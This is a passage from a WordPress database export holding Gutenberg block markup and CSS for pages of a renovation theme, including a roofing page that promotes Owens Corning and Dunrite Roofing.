href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x98)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.1 KB ( 57.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"cta_url\":\"https://dunriteroof.com/\",\"title\":\"Dunrite Roofing\",\"hover_description\":\"Quality and your satisfaction is our priority\",\"img_id\":362,\"img_url\":{\"id\":362,\"title\":\"favicon2\",\"filename\":\"favicon2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"link\":\"https://cteisys.com/favicon2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"favicon2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2022-08-22T17:14:26.000Z\",\"modified\":\"2022-08-22T17:14:26.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 22, 2022\",\"nonces\":{\"update\":\"64b740e15e\",\"delete\":\"e70c4e34ec\",\"edit\":\"b7e85ec790\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=362\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"filesizeInBytes\":8853,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":131,\"width\":171,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":131,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2-150x131.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"height\":131,\"width\":171,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003eNot processed\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\'#\' class=\'wp-smush-send\' data-id=\'362\'\\u003eSmush\\u003c/a\\u003e | \\u003ca href=\'#\' class=\'smush-ignore-image\' data-id=\'362\'\\u003eIgnore\\u003c/a\\u003e\\u003c/div\\u003e\"}}],\"counterId\":\"c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.owenscorning.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Owens Corning</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">At Owens Corning, we know it’s More Than Just a Roof®.</p></div></a><a href=\"https://dunriteroof.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Dunrite Roofing</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Quality and your satisfaction is our priority</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form&nbsp;<a href=\"https://cteisys.com/contact-layout-1/\">here.</a>&nbsp;We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Roofing','','publish','closed','closed','','roofing-2','','','2022-08-25 00:06:12','2022-08-25 00:06:12','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=263',0,'page','',0),(370,1,'2022-08-22 19:22:20','2022-08-22 19:22:20','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"945e453c-85ca-4f75-9bd5-b8e8dc9274eb\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"52f2b85a-f1ae-4ee3-813c-3e033641180e\"} -->\n<style type=\"text/css\"> .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-52f2b85a-f1ae-4ee3-813c-3e033641180e skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"fa65fe9f-9549-4cfd-9b97-dc914e202db5\"} -->\n<style type=\"text/css\"> .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa65fe9f-9549-4cfd-9b97-dc914e202db5\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"72a74329-ab16-4b02-82c4-a618f9b2a974\"} -->\n<style type=\"text/css\"> .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72a74329-ab16-4b02-82c4-a618f9b2a974\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:heading {\"level\":3} -->\n<h3>EXPERIENCE THE DUNRITE DIFFERENCE</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dunrite Roofing has been working hard for three generations to provide you our ultimate goal:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>100% customer satisfaction. Locally owned and operated for 25+ years, contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"0af77322-dee6-4594-9ea0-061dbc66bd6d\"} -->\n<style type=\"text/css\"> .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-0af77322-dee6-4594-9ea0-061dbc66bd6d skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"67f4f5d4-b5cf-437f-a560-cbf35cd52f7d\"} -->\n<style type=\"text/css\"> .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"9342c335-3136-4efc-a308-6fb958ff6656\"} -->\n<style type=\"text/css\"> .block-id-9342c335-3136-4efc-a308-6fb958ff6656 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-9342c335-3136-4efc-a308-6fb958ff6656 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-9342c335-3136-4efc-a308-6fb958ff6656 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-9342c335-3136-4efc-a308-6fb958ff6656 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ff010ed0-2823-4fa8-b10e-da474f695199\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ff010ed0-2823-4fa8-b10e-da474f695199\"><h2 